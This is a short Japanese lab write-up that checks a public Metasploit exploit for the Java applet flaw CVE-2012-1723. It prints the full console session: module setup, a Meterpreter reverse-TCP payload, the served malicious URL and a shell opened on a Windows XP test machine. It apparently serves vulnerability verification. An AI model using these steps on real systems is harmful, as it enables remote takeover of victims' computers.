CVE-2012-1723

CVE-2012-1723 で公開された Java Applet の脆弱性をつく exploit が公開されたので検証

脆弱性の詳細については下記参照
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1723
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-002752.html

Exploit の詳細については下記参照
http://www.exploit-db.com/exploits/19717/
http://www.metasploit.com/modules/exploit/multi/browser/java_verifier_field_access

Metasploit で実行

msf >
msf > use exploit/multi/browser/java_verifier_field_access
msf  exploit(java_verifier_field_access) >
msf  exploit(java_verifier_field_access) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf  exploit(java_verifier_field_access) >
msf  exploit(java_verifier_field_access) > set srvhost 1.0.0.80
srvhost => 1.0.0.80
msf  exploit(java_verifier_field_access) > set srvport 80
srvport => 80
msf  exploit(java_verifier_field_access) > set lhost 1.0.0.80
lhost => 1.0.0.80
msf  exploit(java_verifier_field_access) > set lport 8080
lport => 8080
msf  exploit(java_verifier_field_access) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 1.0.0.80:8080
[*] Using URL: http://1.0.0.80:80/IlDcdK6w4yfJ
[*] Server started.
msf  exploit(java_verifier_field_access) >

古いバージョンの Java を使用している Windows XP から

http://1.0.0.80:80/IlDcdK6w4yfJ

へアクセスしてみる

msf  exploit(java_verifier_field_access) >
[*] 192.168.0.100    java_verifier_field_access - Sending Java Applet Field Bytecode Verifier Cache Remote Code Execution
[*] 192.168.0.100    java_verifier_field_access - Generated jar to drop (5483 bytes).
[*] 192.168.0.100    java_verifier_field_access - Sending jar
[*] 192.168.0.100    java_verifier_field_access - Sending jar
[*] Sending stage (30216 bytes) to 192.168.0.100
[*] Meterpreter session 1 opened (1.0.0.80:8080 -> 192.168.0.100:1039) at 2012-07-12 20:31:59 +0900

msf  exploit(java_verifier_field_access) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >

成功